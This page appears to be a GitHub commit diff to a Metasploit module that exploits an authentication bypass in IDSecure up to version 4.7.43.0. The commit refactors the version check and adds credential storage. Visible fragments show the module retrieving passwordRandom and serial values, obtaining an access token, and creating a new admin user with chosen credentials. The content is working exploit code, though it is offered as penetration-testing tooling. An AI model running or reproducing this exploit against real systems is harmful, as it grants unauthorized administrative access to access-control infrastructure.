Skip to content

Commit c53e5d3

Browse files
h4x-x0rh4x-x0r
committed
Code cleanup and added store_valid_credential
added store_valid_credential code cleanup
1 parent 5fa18a6 commit c53e5d3

File tree

1 file changed

+12
-23
lines changed

1 file changed

+12
-23
lines changed

modules/auxiliary/admin/http/idsecure_auth_bypass.rb

Lines changed: 12 additions & 23 deletions
Original file line numberDiff line numberDiff line change
@@ -50,23 +50,14 @@ def check
5050
return CheckCode::Unknown
5151
end
5252

53-
if res && res.code == 401
54-
data = res.get_json_document
55-
version = data['Version']
56-
if version.nil?
57-
return CheckCode::Unknown
58-
else
59-
print_status('Version retrieved: ' + version)
60-
end
61-
62-
if Rex::Version.new(version) <= Rex::Version.new('4.7.43.0')
63-
return CheckCode::Appears
64-
else
65-
return CheckCode::Safe
66-
end
67-
else
68-
return CheckCode::Unknown
69-
end
53+
return CheckCode::Unknown unless res&.code == 401
54+
55+
data = res.get_json_document
56+
version = data['Version']
57+
return CheckCode::Unknown unless !version.nil?
58+
print_status('Got version: ' + version)
59+
return CheckCode::Safe unless Rex::Version.new(version) <= Rex::Version.new('4.7.43.0')
60+
return CheckCode::Appears
7061
end
7162

7263
def run
@@ -79,8 +70,7 @@ def run
7970
unless res
8071
fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
8172
end
82-
case res.code
83-
when 200
73+
if res.code == 200
8474
json = res.get_json_document
8575
if json.key?('passwordRandom') && json.key?('serial')
8676
password_random = json['passwordRandom']
@@ -115,8 +105,7 @@ def run
115105
unless res
116106
fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
117107
end
118-
case res.code
119-
when 200
108+
if res.code == 200
120109
json = res.get_json_document
121110
if json.key?('accessToken')
122111
access_token = json['accessToken']
@@ -149,10 +138,10 @@ def run
149138
fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
150139
end
151140

152-
case res.code
153-
when 200
141+
if res.code == 200
154142
json = res.get_json_document
155143
if json.key?('code') && json['code'] == 200 && json.key?('error') && json['error'] == 'OK'
144+
store_valid_credential(user: datastore['NEW_USER'], private: datastore['NEW_PASSWORD'], proof: json)
156145
print_good("New user '#{datastore['NEW_USER']}:#{datastore['NEW_PASSWORD']}' was successfully added.")
157146
print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}/#/login")
158147
else

0 commit comments

Comments
 (0)